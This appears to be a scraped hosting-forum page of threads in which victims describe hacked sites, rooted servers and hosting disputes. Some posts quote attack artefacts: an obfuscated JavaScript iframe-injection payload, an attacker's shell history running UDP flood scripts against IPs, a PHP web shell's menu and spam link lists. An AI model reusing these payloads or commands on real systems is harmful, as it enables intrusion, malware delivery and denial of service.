Web Hosting :: Hijacked / Hacked Domain By HostOnce

HostOnce.com ...
I came across this website from doing research on new webhosts as my current host, HostOnce, has completely disregarded all of their customers.

My site, Aero247, has been done for over 15 days and there are absolutely no signs that it will be brought back up and running anytime soon. I've submitted numerous support tickets and have yet to receive any answer from the joke that is tech support.

When I login to my FTP server, there is a folder titled "Delete and recreate your FTP account." I've done that numerous times and that folder is still there, and nothing else is! I can't delete that folder or upload anything to the server.

If you do a quick Google search for "HostOnce review" you'll notice that I am not the only one having the problems.

Stay away from HostOnce at all costs! I now have to completely rebuild a site that I've been working on for five years.

View Replies! View Related

Hostonce - Cancelling
I wanted to get out of the contract with them for a long time ago. I think it was october 2006. I asked them I wanted to get out of the contract, but they told me I had to stay with them until october 2007, since they had already extended the contract ( without asking me. ) I contacted them October 2007, and then they said I only can get out the contract after March, since (again) the contract was extended. Now, I contacted them to get out the contract, I posted the message, at their helpdesk and sent email to the billing department. No reply for a week.

I just need to switch the host. My newhost is helping me, but unless they relese my domain, I can't switch. and they don't give me the authorization code. Hostonce is terrible host.

View Replies! View Related

Website Hacked, IP And Domain
This is the second time this week that my website was hacked. On the first hack attempt they somehow got into my cpanel and corrupted my license file which I had my host fix. Other than that the only damage done was an html file that replaced my main page. Then today, I find that my website has been further compromised, but by a completely different group. The first hacker was g3n3t1x and this second hack was done by www.turkishdefacerteam.com

Now, the problem is my sites dedicated IP is 72.36.192.150, and my domain name is gamingguilds.net, but if you resolve the domain name, it resolves to 74.53.52.66. I have checked my nameservers and everything is set properly. But the thing I don't get is that when you type in my domain name in a web browser, you see my website. How can it be resolving to the wrong IP and STILL show my website. Also note that when you type in my dedicated IP it would still show my website (before this second attack).

Now after the second attack, my dedicated IP no longer works, I cant get into cpanel using the IP, I cant get into my FTP account, and I get view my website. Yet if you use the domain name to log into cpanel or view the website it works. The strange part here is that I can't get into the FTP using the domain name.

SO, if you go to [url]you see a blank cpanel site, if you go to [url] you get a 404 error, and if you go to www.gamingguilds.net you get my website.

View Replies! View Related

Facebook's Domain Name/dns Hacked
A while back you could see the following information regarding facebook.com:

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Server Name: FACEBOOK.COM.ZZZZZ.GET.LAID.AT.WWW.SWINGINGCOMMUNITY.COM
IP Address: 69.41.185.229
Registrar: INNERWISE, INC. D/B/A ITSYOURDOMAIN.COM
Whois Server: whois.itsyourdomain.com
Referral URL: http://www.itsyourdomain.com

Server Name: FACEBOOK.COM.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
IP Address: 203.36.226.2
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net

Domain Name: FACEBOOK.COM
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net
Name Server: DNS04.SF2P.TFBNW.NET
Name Server: DNS05.SF2P.TFBNW.NET
Name Server: DNS1.SCTM.TFBNW.NET
Name Server: DNS2.SCTM.TFBNW.NET
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 02-aug-2007
Creation Date: 2 Expiration Date: 30-mar-2010

>>> Last update of whois database: Mon, 28 Jan 2008 23:23:21 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict oWhois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. .....

View Replies! View Related

My Server Has Been Hijacked
My hosting provider has told me that my server has been "fully rooted" and the only way to fix it is a reinstallation from scratch. That is very frightening to me because it will take a lot of time to set-up again and this will cause major downtime.

Is there no other way to resolve the issue without reinstallation?

--------------- Quote from hosting provider ---------------

">> Does this mean that my passwords do not need to be changed?

Server is fully rooted, and will need to be reinstalled. Leaving the server online is a very, very serious risk for you. Let me show you some of the powers the hax0rs have at this time from their upload/hax0r script.

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
- regexp

Upload

[ Read-Only ]

Make Dir

[ Read-Only ]

Make File

[ Read-Only ]

Go Dir

Go File

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | LOCUS7S | Generation time: 0.0396 ]-- "

View Replies! View Related

Web Site Hijacked
I found out that there were some hidden iframe tags injected on my website. So I grepped and cleaned all html files. Am I supposed to change my ssh/sftp password as well? Is there anything else I'm supposed to do?

View Replies! View Related

Hijacked Server Traffic
Is it possible that someone on the same network as my server (shared hosted, freebds) could somehow cause my traffic to be diverted to a new url after visitors landed on my website?

I assume this person has access to my home PC also and is reading what I type here etc. Has the ability to allow domains and IP's and divert others on my server, IS in the position to know who to allow and deny (my affiliates, customers etc IP's are recorded etc)

IF this was possible, how would I be able to catch this person out?

Where would I look for evidence of this and what am I looking for?

I don't manage my DNS and asking my server host (my suspect hosts with them too) gets a reply like: I don't understand what your asking? Do you need webaliser stats?

How would someone be able to do what I'm guessing is happening: That people can land on my site.. however, this guy can than redirect them to his own paying page. If I set a link here to my site..he'd soon add its domain to "allowed" etc etc.

I'm thinking I need access to server access to my dns, login info and Last Modified details on those file. I don't have these. I don't know what I'd be looking at if I had them.. and my server tech hasn't offered to look at such things.

My interest is more than intellectual.

Until last weekend my 2 1/;2 year project that has grown in sales volume beyond my expectations. I had had no contact with this person for 8 months and in that time sales where consistent. I Had changed all accesses, IP etc etc. I used to host with him. Then moved hosts since I didn't trust him (same problem back then - sales fell to nothing but traffic grew) moved to my current host.. not long after find HE is now on that host too.. now after I have contact from him again, sales have gone flat without any explanation, even though traffic has increased! 1:300 has become 1:10000 and I have checked everything site side (I'm a webmaster for over 10 years)

I'll be ruined very shortly and I don't know what to do.

View Replies! View Related

HostNine - Hijacked A Client Account; Won't Give Files Back
I have been with HostNine for almost a year now and have had reasonably decent service, until now.

They recently suspended one of my client's accounts. Understandable, the account had some very old PHP files on them. Let me preface this by stating that I am very sympathetic to hosts who have to deal with problem clients who have sites that slow down shared servers for everyone else on them.

I have tried my hardest to work with HostNine to get these files back and ensure that this account is not a problem on their server. I have never once asked for them to restore the account "as is", all have I have asked is that they backup the files and the database for me (I would do it myself, but they locked me out of the account), so that I can investigate the problem and do testing to ensure that it doesn't cause them problems again.

All in all, getting anyone to co-operate has been unsuccessful. Getting a hold of them has been a hassle (from the time I e-mailed them about the issue to the time I received my first response was a span of over 6 hours). Getting them to co-operate has been impossible. Their "Support Manager", Alex, in broken English has told me next to nothing, aside to accuse me of trying to "get around this" and that I would need to move the account to one of their dedicated plans. I have asked that the account simply be backed up, but have not received any response so far, as time ticks away and the client whose account this was becomes more and more frustrated as their files are effectively being "held hostage".

My last complaint is that they never notified myself, nor the client that they had suspended the account.

Has anyone else had problems with trying to get their files back after a host has locked you out of your account? What are my options? Does the hosting company technically "own" the files, simply because they are being hosted on their server?

View Replies! View Related

"Catch All" Email Hijacked
i have set email for some domain to catch all setting. After some time i have a lot of bounce, redirect and rected email to address. How come my email accounts are hijacked and what to do to prevent such things in case of catch all setting.

Here it is noteworthy catcth all used to attract a lot of spam.

View Replies! View Related

Redirecting Domain.com And Www.domain.com To X.domain.com
I own a website, domain.com.

When people go to [url] or [url] I would like them to be redirected to [url]

View Replies! View Related

Hacked Or Not
2 days ago i noticed my cpanel hardisk usage was a lot more then it should be, after looking around i found out my inbox was 400mb (82143)emails!! i don't use any of the cpanel email because i have them set to forwarding. all the emails are spam and i discovered a few emails using my domain (that i did not create) that are valid and when i email them it reaches this cpanel inbox

So how bad is it? have i been completely comprised or is someone managed to get some type of spaming access only?

View Replies! View Related

Been Hacked
I have a server with about 100 domains on it in Plesk. I have about 10 or so clients that pay me a pittance to host their site and the rest are various domains that have been parked.

About a week ago we received a "too many connections" error when accessing Plesk. This is our server and it sits at The Planet (formerly EV1). I cranked up the mx connections to 1,100 or so following some web tutorial but I'm really a complete idiot when it comes to this server stuff. (I'm more of a php / html kind of guy).

I check out logs and it appears that someone has been trying to access a bunch of celebrity images that shouldn't exist on our server. It's clearly spam of some kind. I can't seem to actually find these images on my server anywhere, but I've got a feeling that foul play has been involved.

View Replies! View Related

I Got Hacked
Well, this is rather weird. I cant tell if this is a server error, or a hack.

Basically the contents of the thumbnail directories for videos, games and pictures were deleted, at 3pm today (according to the ftp time stamp). All those folders were chmodded 777, to allow PHP to upload the images into them.

View Replies! View Related

Hacked
My cpanel server has an intruder who brought all the sites down. I did my best to harden the server a year or so ago, but...

I got an email from one of my scripts:

SUBJECT: [hackcheck] kill has a uid 0 account

IMPORTANT: Do not ignore this email.
This message is to inform you that the account kill has user id 0 (root privs).
This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.

To say the least, the server was compromised. I cannot find the user "0" or "kill" in WHM, but under "Wheel Group Users" "kill" is listed under "Add a user to the wheel group."

Any help or insight would be appreciated! Anyone proficient at hardening servers and exorcising hackers?

I uploaded the latest chkrootkit and ran it. The results say it's clean.

View Replies! View Related

Am I Hacked And Anything I Can Do
Am I hacked by somebody?

Any thing I can do to stop this (for example by hiring server management company)???

Here's the info that RKHunter provided:

/sbin/modinfo [ NA ]
/sbin/insmod [ NA ]
/sbin/depmod [ NA

Rootkit 'RH-Sharpe's rootkit'... [ Warning! ]

--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /dev/null).
--------------------------------------------------------------------------------

Checking users with UID '0' (root)... [ Warning! (some users in root group) ]
info: adm:0

And here's the info I've found after investigation:

-bash-2.05b# pwd
/usr/local/games
-bash-2.05b# ls -lah
total 332K
drwxr-xr-x 3 root root 4.0K Feb 5 15:59 .
drwxr-xr-x 15 root root 4.0K Feb 12 19:32 ..
drwxr-xr-x 3 1555 1555 4.0K Feb 2 12:58 .fl
-rwxr-xr-x 1 root root 263K Feb 2 12:51 ettercap
-rwxr-xr-x 1 root root 17K Feb 2 12:51 parse
-rw-r--r-- 1 root root 119 Feb 2 12:51 pid
-rw-r--r-- 1 root root 27K Feb 3 17:44 x
-bash-2.05b#

View Replies! View Related

Am I Hacked
i daily check my error log files to see if something was wrong , checkout what i found

the first one is probably trying to hack my site to get to my ads and changing it to them i think
[error] [client 195.23.16.24] File does not exist: /var/www/html/a1b2c3d4e5f6g7h8i9
[error] [client 195.23.16.24] script '/var/www/html/adxmlrpc.php' not found or unable to stat
[error] [client 195.23.16.24] File does not exist: /var/www/html/adserver
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpAdsNew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpadsnew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpads
[error] [client 195.23.16.24] File does not exist: /var/www/html/Ads
[error] [client 195.23.16.24] File does not exist: /var/www/html/ads

this 1 I dont know

[error] [client 71.190.229.120] File does not exist: /var/www/html/_vti_bin
[error] [client 71.190.229.120] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/_vti_bin
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice

This 1 is kinda keep me scared i dont know what it is either

[Mon May 21 16:11:00 2007] [error] [client 129.29.227.4] Invalid URI in request T 5.1; U; en)
[Tue May 22 15:59:09 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179781859
[Tue May 22 16:09:15 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:20 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:24 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:29 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:29:29 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179868171
[Tue May 22 16:30:23 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179869368
[Tue May 22 16:30:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:30:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0

View Replies! View Related

Hacked
my server hacked

24 cat /proc/cpuinfo
25 ls
26 cd /var/tmp
27 ps x
28 ls
29 mkdir .www
30 cat /proc/cpuinfo
31 cat /etc/issue
32 mkdir .ww
33 cd .ww

36 download alexscan.tar.gz
37 tar xvfz alexscan.tar.gz
38 tar xvf alexscan.tar.gz
39 cd Vek
40 ls
41 ./Vek 210
42 ls
43 cd ..
44 ./ss
45 ls
46 cd ..
47 cd .ww
48 download joker.tgz
49 tar xvfz joker.tgz
50 download flood-udp.tar
52 tar xvfz flood-udp.tar
53 tar xvf flood-udp.tar
54 perl udp.pl 72.8.131.39 0 0
55 perl udp.pl 89.42.72.6 0 0
56 perl udp.pl 83.42.64.149 0 0
57 passwd
58 ls
59 cd joker
60 ls
61 chmod +x *
62 ./x 23.12

View Replies! View Related

Hacked? Or Not
I have a new server and I have hardened it with csf+lfd. It's about 65/70 in the cfs score.

This morning, I noted that lfd log sent me an email saying there is a SSH login via 207.210.233.128 on 10th May 2007. I am not sure whether it was a successful login or not?

Here is the output:
=================
Time: Thu May 10 01:31:52 2007IP: 207.210.233.128 (Unknown)Account: rootMethod: password authentication
========================

I know for sure that I did not login my SSH yesterday.

However, when I logged in SSH this morning, it says in telnet that my last login was from my own home computer's IP, so from that it looks like no one else has logged in SSH since last time I logged in myself.

Was my server intruded or was lfd just playing up?

View Replies! View Related

I've Been Hacked
Go to this page:

[url]

how I can find out what page they have changed? It is a php file with loads of includes etc. Not sure where to look! Or could it be a redirect or something?

View Replies! View Related

Forward Mail From Parked Domain To Primary Domain - How? MX Record?
OK, I am confused. I have one domain that is parked on top of another domain. I would like Mail that comes to the parked domain to be automatically forwarded to the same user name at the primary domain.

Can I change a DNS or MX record to facilitate this?

View Replies! View Related

Reverse Domain Name Server (DNS) ARPA For Domain On VPS
I have a vps with dedicated ip's for my domain names.

I read that in order for mails coming from my server not be picked up as spam, i need to add reverse ip entries.

Now i have already added the glue nameserver records on my godaddy control panel,

ns1.mydomain.com -> 10.20.30.40
ns2.mydomain.com -> 10.20.30.41

But do i need to speak to the datacenter to add the reverse dns entries for my domain on their nameservers? What about if i host my nameservers offsite, but then have my webserver/mailserver etc inside the datacenter? Would i need to request the datacenter where the nameservers are hosted to add the reverse ip entries for the domain, and then the request the same from the datacenter for my web/mail servers to add the reverse entries?

Is it really required?

View Replies! View Related

Website Hacked
So I'm interviewing with a company and when I typed in the URL to their website, I was met with a nasty surprise: a "hacked by so and so" message! However, after looking closer, I see that I had accidentally appended a period (".") to the end of the domain name, for example: http://www.example.com./

When I removed the period, the site appeared as normal. I don't know anything about the server other than it's IIS. Is there anything I can suggest to them when I go in to interview? I'd like to point this out to them; it may even help my chances at landing the job! (It's not related to networking, though.)

View Replies! View Related

WHMCS Hacked
Now, first of all... I'm not sure if this is a problem with WHMCS or some other piece of software with a security hole, but I thought I should post here.

Our WHMCS got hacked earlier today and the hacker sent out a to be honest, unacceptable email to all clients, I won't go into detail but lets just say it directly insulted them.

Now apart from ruining our reputation and client relationships, I am now completely paranoid that it will happen again. I'd also like to know how it happened in the first place. The hacker signed up for a hosting account, and then sent the email. I have no idea how he/she did it, but when I look at the admin log in WHMCS, it shows the username "hacked" as logging in (see image).http://img378.imageshack.us/img378/2560/hackedmh9.png

Just a warning to everyone out there. His IP address was 86.132.228.82.

View Replies! View Related

SITE WAS HACKED!
A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?

View Replies! View Related

We Were Hacked, Where Do We Start.
we have a vps server and someone did what I would call a calling card attack, thankfully.

It is a stock kubuntu os with stock apache. Root passwords for everything have been changed to our own

Somehow they logged into kubuntu as root and changed the htpasswd in usr/passwords (changed to protect the password).

Then since they changed the htpasswd they were able to log into phpmyadmin and changed the admin password in the database.

I'm pretty sure I know who did it and he is teaching us a lesson which I respect but he will not comunicate with us.

We have hourly snapshots of our vps and we need to know how they are getting in. See my sig and click on the hotspot login.

Looking at the sudoers there is the Defaults line that we suspect as a means to get in.

We have a great php etc... app but it is either Apache or kubuntu that they can get in.

I would like to learn about what needs to be done about security but where do I start?

Can someone help me look for something that would allow the attack?

I'm a php guy and it is not a mysql injection attack nor is it an xss attack.

I am not a kubuntu / server security guy and now need your advice.

View Replies! View Related

Hacked VPS
I am renting a 384mb Plesk VPS, have 1 client website on it, and it was hacked. Someone set up a new user with root access and was attacking other networks including dictionary attacks. My host has cleaned up the mess. I suspect access was gained thru a weak password choice or thru a Wordpress hack.

The client website ran a php/mysql survey script sometimes with 20-25 simultaneous users, and about 5-10% were unable to complete the survey due to screen freeze up or time outs. I'm trying to get to the bottom of these errors and know that some of the problems were client side but could the attacks also have affected connectivity & website performance?

View Replies! View Related

My Site Has Been Hacked
One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.

Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.

I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.

View Replies! View Related

My Server Seems Be Hacked
SOme one has claimed that he has penetrated my server and has gathered some kind of information via shell access, I have disabled the possible ways of shell access for the users via twaek settings, and php.ini

- How I can check he has made any backdoor for himself or not?
and I have made a trojan check via Scan for Trojan Horses in WHM, and it has found about 200 possible trojans.

- How I can remove them?

View Replies! View Related

Was My Server Being Hacked ?
217.67.250.41 - - [18/May/2009:15:36:08 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"

What is mean ? Sorry for ask a fast answer. I have change my domain's IP to protect someone can run dangerous script...

View Replies! View Related

My Server Hacked?
My dedicated server was rather slow. Upon checking, I had a new cron job, (deleted now) made by apache, pinting to the following IRC bot.

[root@server50040 tmp]# cd .LiveZone/
[root@server50040 .LiveZone]# ls -al
total 384
drwxr-xr-x 10 apache apache 4096 Dec 21 12:17 .
drwxrwxrwt 3 root root 4096 Dec 21 12:15 ..
-rwxr-xr-x 1 apache apache 320 Dec 9 2004 config
-rw------- 1 apache apache 1002 Dec 9 2004 config.h
-rw-rw-r-- 1 apache apache 55 Dec 20 22:55 cron.d
-rwxr-xr-x 1 apache apache 347 Dec 9 2004 ****
drwxr-xr-x 2 apache apache 12288 May 31 2002 help
-rwxr-xr-x 1 apache apache 210216 Dec 9 2004 httpd
drwxr-xr-x 2 apache apache 4096 Jan 12 2002 lang
-rw------- 1 apache apache 492 Dec 21 12:17 livezone
-rw-rw-r-- 1 apache apache 19 Dec 20 22:55 livezone.dir
-rw------- 1 apache apache 492 Dec 21 12:09 livezone.old
drwxr-xr-x 2 apache apache 4096 Dec 21 12:10 log
-rw-r--r-- 1 apache apache 2137 Sep 26 2003 Makefile
-rw-r--r-- 1 apache apache 731 Dec 9 2004 makefile.out
-rwxr-xr-x 1 apache apache 15090 Dec 9 2004 makesalt
drwxr-xr-x 3 apache apache 4096 Jul 30 2000 menuconf
drwxr-xr-x 2 apache apache 4096 Jul 17 2000 motd
-rwxr-xr-x 1 apache apache 14306 Nov 13 2003 proc
-rw------- 1 apache apache 6 Dec 21 12:10 psybnc.pid
-rw-r--r-- 1 apache apache 10780 Dec 9 2004 README
-rwxr-xr-x 1 apache apache 68 Jun 4 2004 run
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 scripts
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 src
-rw------- 1 apache apache 3901 Jan 12 2002 targets.mak
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 tools
-rwxr--r-- 1 apache apache 21516 Sep 25 2002 xh
-rwxrw-r-- 1 apache apache 194 Dec 20 22:55 y2kupdate

View Replies! View Related

Server Hacked ...
My server was hacked some time ago. I've changed passwords and scanned system for viruses, but found nothing.

Now, I'm looking into the log file /var/log/messages and I have few questions:

1. There are a lot of messages like: Apr 2 02:53:09 host
sshd(pam_unix)[29398]: authentication failure; logname= uid=0 euid=0 tty=ssh
ruser= rhost=203.196.151.235

Do these messages mean that hacker trying to enter the server under root?

2. There are messages like these:
Apr 2 03:56:10 host clamd[4678]: stream 1255: Worm.SomeFool.P.2 FOUND
Apr 2 10:46:10 host clamd[4678]: stream 2008: Worm.Bagle.pwd-eml FOUND

What does this mean? Virus on my server or something else?

3. Also, I can see a lot of messages like this one:
Apr 2 09:38:40 host clamd[4678]: stream 1111: Email.Phishing.RB-524 FOUND

Does someone read my emails?

View Replies! View Related

New Server Hacked
My server just got hacked i just bought it!!

and they was going to charge me anouther $35 to reset the password how stupid...

in the end we got it done free

View Replies! View Related

SwiftNIC Hacked?
does any of you know what actually happened with SwiftNic Servers?

My site (www.wincert.net) is unaccessible for almost 20 hours now and I haven't got a reply from my host! I was located on semi-dedicated server.

I've only got this mail about 12 hours ago:

Dear customers,<br /> <br /> We have discovered that our WHMCS client database may have been compromised in the last 48 hours.  While important information such as credit card data is encrypted it is possible that your password or your server login (if mentioned in a support ticket) may have been exposed.<br /> We encourage all customers to change their billing and Server login passwords ASAP.<br /> <br /> We are still investigating this incident so we can identify any possible weaknesses of our internal systems and take appropriate steps to maximize the <span class="nfakPe">security</span> of your information.<br /> Please let us know if you have any questions or need any assistance<br /> <br /> regards<br /> <span class="nfakPe">Swiftnic</span>

Who should I call, talk to, as for help, 'cause I really need my site back ASAP..

View Replies! View Related

How Do Websites Get Hacked?
Every now and then I'll run into a website that has a message that says it was hacked by a certain hacker. How exactly do this? Do they hack into the actual server or do they somehow get a hold of the website owners FTP info?

View Replies! View Related

Blog Got Hacked
One of my wordpress blogs got hacked and my site is redirecting to a different site.... When I check the phpmyadmin, there is another sql server that I am not familiar with... and there are around 17 table... I cannot delete the tables... I already contacted my host and still waiting for response...

The installed database is "information_schema (17)"

Are you familiar with this?

View Replies! View Related

Has Ipower Been Hacked?
I've had a Ipower hosting account since 2002 and recently even renewed both my service and domain registration.

I recently noticed that a small/odd javascript statement had been added to the bottom of my page and I didnt add it. I noticed this after visiting my page and when my Antivirus alerted me to ' HTML/Dldr.Iframe.DP [virus]' apparently some type of iframe redirect via this script to download malware.

After googling around about "HTML/Dldr.Iframe.DP [virus]" I found another person who has an ipower account mentioning the exact same problem on their site.

Does anybody know anything abou this?

Has anybody heard anything about ipower sites being recently hacked or something?

How and why has this happened? is my site just special and am I lucky? or has this recently also happened to other ipower accounts to?

I've contacted ipower but expect some generic response of no real help.

Most importantly, should I go through my few pages which comprise in fact my quite small site and check to see if they also have been hacked with malicious javascript code? Should I upload new pages? Change my password?

All of my content looks ok and in place, no pages defaced except apprently this small insertion of malicious javascript cod at the bottom of my main index page.

I have pasted just the basic fragment of the code below -

<script>eval(unescape("%77%69%6e%64%6f .....

View Replies! View Related

Site Up And Down- Am I Being Hacked
My site keeps going down every 10 minutes. It'll be online for 10 minutes, than down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself site keeps crashing!

And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.

Quote:

<script type="text/javascript" src="swfobject.js"></script>

<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,11 4,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,3 9,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104, 50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114, 39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52, 52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>

What the heck is going on?

View Replies! View Related

Server Hacked
My server was hacked night before last and here is the log

Oct 28 10:30:47 server1 [19705]: connection from "173.45.118.58"
Oct 28 10:30:47 server1 [19705]: User root's local password accepted.
Oct 28 10:30:47 server1 [19705]: Password authentication for user root accepted.
Oct 28 10:30:47 server1 [19705]: User root, coming from 3a.76.2d.[url], authenticated.

View Replies! View Related

Website Has Been Hacked
Just this week, I believe one of my site has been hacked...or potentially my whole server! When accessing the website (a vBulletin forum), instead of going to the main page, we get a screen that looks like Window's "My Computer" and there is a scan running. Firefox has blocked the site for suspicion.

I am stumped. Where to begin? I have full SSH access to my server (after rebooting it). Thank you in advance.

Server: CentOS Linux 4.3

View Replies! View Related

Ecatel Hacked
quick quote from what i got from a friend on msn:

Quote:

[3:08] @(garrett) Hey Sean
[3:08] @(garrett) Do we know whats going on yet?
[3:09] @(Sean) no
[3:09] @(Sean) ecatel is confused right now
[3:09] @(Sean) hackers may have access to more than helpdesk
[3:10] @(garrett) :/

and from my other friend on msn:

Quote:

ViSiOn says:

i woke up today to find e-mails from the help desk asking for all our servers to get wiped and formatted... so im going to have a few 1000 pissed clients.
ViSiOn says:

all my account info was changed too. i can't do anything. and i can't even reach ecatel via e-mail without my tickets getting deleted.

View Replies! View Related

Site Is Hacked
I got a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... can not and it shows homepage like this:

[url]

View Replies! View Related

Servage Hacked
We've been hacked, again. By we, I mean, many many servage clients as far as I can tell. Unlike past Javascript injections, this time it is much more serious, at least to me anyhow. Here is what I know:

Somehow, someone has gained full access to my (and again, many others) control panel on servage.net.

While on there, they have generously created their own ftp accounts with full access.

Every website I host with servage had a number of files uploaded to them.

These files consisted of one or more .htaccess files that contained a number of rewrites pointing to the other files they uploaded.

The new files were actually cleverly hidden inside other directories where they would go unnoticed. For example, on some of my sites that have forums, they were put into /forum/include/tmp/(bogus files), and in my galleries, put into such directories as /images/photos/(bogus files).

The files themselves are as follows:
a .htaccess file
css.js
keys.txt
links.txt
main.php
texts.txt
and tpl.php

The links.txt file itself is over 1.9mb and contains links to hundreds of other infected SERVAGE hosted websites ( I have checked at least 30 of them in whois.org and found all are hosted at servage).

Here is an example of the links.txt file:
chipandachair.co.uk/language/include/include/topic~3312.html|black break spring
chipandachair.co.uk/language/include/include/topic~1562.html|free exploited black teens
ra4prints.co.uk/inc/forum/style/group~190.html|nudist photographys
ra4prints.co.uk/inc/forum/style/group~3827.html|my nudist links
And so on and so forth.

Keys.txt is a giant list of pornographic phrases and texts.txt is just random phrases in general.

I have contacted servage about this multiple times and have gotten their basic cookie cutter response of please remove the files from all your websites, change all your passwords and delete the new ftp accounts created. I asked them point blank if they've been hacked and they've continued to say no.

If you are a servage customer, make SURE you log into your control panel RIGHT NOW and check to see if new ftp accounts have been created. After that, look at your website statistics and click on DISPLAYED PAGES and look for odd entries like /blabla.html/links?12982.html or some such thing and pay attention to where the link is showing up (What directory) which will help you remove all of the crap someone put on there.

This is very serious guys... as I said, someone had full access to my Control panel. With that, they could enter into any of my sql databases, fully see all the passwords to each database (as servage kindly shows your password to anyone when you click on connection information) not to mention any sensitive customer data I may have had stored in my databases.

This hack also kills your website in a number of ways:

1) It tries to redirect any page on your site to the index.php uploaded to your site which then directs you to porn sites.

